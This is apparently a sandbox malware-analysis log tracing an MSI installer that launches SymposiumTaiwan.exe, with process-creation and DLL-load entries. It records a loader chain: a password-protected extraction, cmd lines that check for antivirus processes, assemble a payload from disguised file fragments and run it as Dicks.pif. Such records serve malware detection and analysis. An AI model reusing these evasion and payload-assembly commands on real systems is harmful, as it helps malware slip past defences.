Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Process created: C:\Users\user\Desktop\SymposiumTaiwan.exe "C:\Users\user\Desktop\SymposiumTaiwan.exe"
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Open Open.cmd & Open.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 558563
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "cbsinchhavefcc" Basketball
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Upc + Beverages + Hero + Displaying + Version + Fm + Emotions 558563\k
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif 558563\Dicks.pif 558563\k
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 5
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6E4C0896962209942EF6224878A6EC23
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Process created: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif C:\Users\user\AppData\Local\Temp\558563\Dicks.pif
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp "C:\Users\user\AppData\Local\Temp\MSI53B9.tmp" -pqwerty2023 -s1	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 4C0B4EE6A62E23CFF044B1F01FFADBEC C	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6E4C0896962209942EF6224878A6EC23	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Process created: C:\Users\user\Desktop\SymposiumTaiwan.exe "C:\Users\user\Desktop\SymposiumTaiwan.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Open Open.cmd & Open.cmd & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 558563	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "cbsinchhavefcc" Basketball	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Upc + Beverages + Hero + Displaying + Version + Fm + Emotions 558563\k	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif 558563\Dicks.pif 558563\k	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Process created: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msihnd.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srclient.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Section loaded: wintypes.dll	Jump to behavior
